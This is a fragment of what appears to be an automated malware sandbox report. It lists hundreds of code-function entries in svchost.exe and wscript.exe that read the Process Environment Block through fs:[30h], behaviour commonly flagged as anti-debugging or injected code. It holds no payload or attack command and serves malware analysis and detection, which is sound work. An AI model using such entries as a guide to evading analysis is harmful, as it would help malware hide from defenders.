          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03924F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03937E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03922D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03951DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03933D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03947D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03963D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04938CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04934015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04934015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04921C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0493740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04880050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04880050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04922073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04931074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0488C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04862D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04892990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04891DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04918DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04938D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04884120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04894D3B mov eax, dword ptr fs:[00000030h]
